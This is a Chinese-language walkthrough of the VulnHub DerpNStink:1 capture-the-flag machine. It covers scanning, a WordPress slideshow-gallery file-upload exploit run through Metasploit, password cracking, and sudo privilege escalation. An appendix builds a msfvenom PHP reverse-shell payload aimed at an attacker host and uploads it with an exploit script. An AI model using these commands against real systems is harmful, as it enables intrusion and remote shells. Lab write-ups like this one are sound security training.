zoukankan      html  css  js  c++  java
  • VulnHub靶场篇15-DerpNStink:1

    靶机地址:DerpNStink:1~ VulnHub
    难易程度:3.0 / 10.0

    文章简要记录渗透靶机每一个过程,对于渗透过程中的每一步并非十分的详细,其中部分内容会有错,望读者指出错误,谢谢!

    摘要:基础信息扫描后,访问网站服务,审查得到Flag1。使用WPScan扫描到slideshow-gallery插件的任意文件上传,通过msf得到一个网站shell,在配置文件中找到数据库密码,登陆进phpmyadmin,得到Flag2。破解数据库中用户的密码哈希值,使用jonh破解,使用su切换到stinky用户,在该用户的家目录下找到Flag3。搜索到pcap文件,通过scp命令远程拷贝文件至kali中,再使用Wireshark分析数据包,获取到mrderp用户的密码,使用ssh登录进该用户,根据用户sudo的权限,构造提权的文件得到root权限,得到Flag4。

    待完善地方:jonh破解,scp命令,Wireshark分析数据包

    基础信息收集

    靶机ip为:192.168.1.247

    端口扫描结果:

    hhh@HHH:~$ sudo nmap -A -sS -sV -p- -T5 192.168.31.247
    Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-25 19:14 CST
    Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
    NSE Timing: About 0.00% done
    Nmap scan report for 192.168.31.247
    Host is up (0.00053s latency).
    Not shown: 65532 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.2
    22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
    |   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
    |   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
    |_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
    80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
    | http-robots.txt: 2 disallowed entries 
    |_/php/ /temporary/
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: DeRPnStiNK
    MAC Address: 08:00:27:87:2C:9B (Oracle VirtualBox virtual NIC)
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE
    HOP RTT     ADDRESS
    1   0.53 ms 192.168.31.247
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 12.47 seconds
    

    Flag1

    这个flag只需要简单的网页审查

    F12进行检查,找到flag1

    flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)
    

    4.jpg

    Flag2

    1. 对网站目录扫描
    dirb http://192.168.31.247
    

    得到/temporary/weblog等目录,但是/temporary没东西,前往/weblog目录

    5.jpg

    发现被重定向到一个域名中,并且网页打不开,在hosts文件中加入DNS解析关系

    6.png

    可以看到,这时可以查看到页面内容

    7.png

    1. 使用WPScan扫描
    wpscan --url http://derpnstink.local/weblog -e
    

    这里家-e参数用于枚举用户名

    可以看到有个插件

    9.png

    可以看到枚举到有两个用户

    10.png

    使用弱口令去看测试用户密码得到:admin:admin

    11.png

    1. 在MSF中搜索相关漏洞

    使用第一个模块,这里看出是任意文件上传漏洞

    8.png

    设置相关项 之后执行,得到一个shell

    62wnVP.md.png

    前往/var/www/html/weblog/目录,查看相关配置文件wp-config.php得到数据库用户名和密码root:mysql

    13.png

    前往网站登录进phpmyadmin

    14.png

    在wp-posts表中查看到Flag2

    15.png

    Flag3

    在数据库内找有一个用户及密码,尝试破解

    3.jpg

    可以先通过hash-identifier判断类型

    16.png

    使用john进行破解,得到密码wedgie57

    1.jpg

    /etc/passwd中发现两个服务器用户

    17.png

    尝试切换用户,发现stinky的密码正好是wedgie57

    这里su需要终端,先输入下面的命令开启终端

    python -c"import pty;pty.spawn('/bin/bash')"
    

    18.png

    前往home/stinky,找的Flag3

    19.png

    Flag4

    在Documents目录下发现一个分析包,使用scp命令将他传回到kali上

    但是scp是基于ssh登陆的,这里需要私钥,先搞到私钥

    在下面目录下找到私钥信息,文本拷贝,在kali上创建一个key.txt文件,

    20.png

    再使用scp命令进行文件传输

    scp -i key.txt stinky@192.168.31.246:/home/stinky/Documents/derpissues.pcap ./derp.pcap
    

    21.png

    使用wireshark分析文件包,这里需要找到一些密码信息,就先过滤http协议,找到mrderp:derpderpderpderpderpderpderp

    22.png

    直接ssh登录

    使用sudo -l查看当前用户的sudo权限

    23.png

    24.png

    可以看出mrderp用户可以使用sudo权限执行/binaries/derpy*文件

    我们创建目录及文件,并在文件中写入

    #!/bin/bash
    /bin/bash
    

    62aZzd.png

    得到flag4

    62amQA.png

    总结&拓展

    获取shell除了使用msf的漏洞模块,还可以直接下载POC文件,手动执行得到shell

    手动生成反向shell连接

    这里连接时出错

    1. 生成反向连接的脚本
    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.43.131 LPORT=4449 -f raw > sh33l.php
    
    1. 下载该利用脚本,执行该脚本,打开本地的监听端,访问该脚本
    python exp.py -t http://192.168.43.148/weblog -u admin -p admin -f sh33l.php
    
    curl https://bootstrap.pypa.io/2.7/get-pip.py -o get-pip.py
    sudo python get-pip.py
    
    http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php
    

    参考

    https://medium.com/infosec-adventures/derpnstink-walkthrough-f36a76530386

  • 相关阅读:
    HTML入门(一)
    WEB攻击手段及防御第2篇-SQL注入
    公司来了个新同事不会用 Lombok,还说我代码有问题!
    最流行的 RESTful API 要怎么设计?
    Spring Boot & Restful API 构建实战!
    分布式事务不理解?一次给你讲清楚!
    带着问题学 Kubernetes 架构!
    Linux 与 Unix 到底有啥区别和联系?
    Java虚拟机最多支持多少个线程?
    常用的 Git 命令,给你准备好了!
  • 原文地址:https://www.cnblogs.com/labster/p/14672042.html
Copyright © 2011-2022 走看看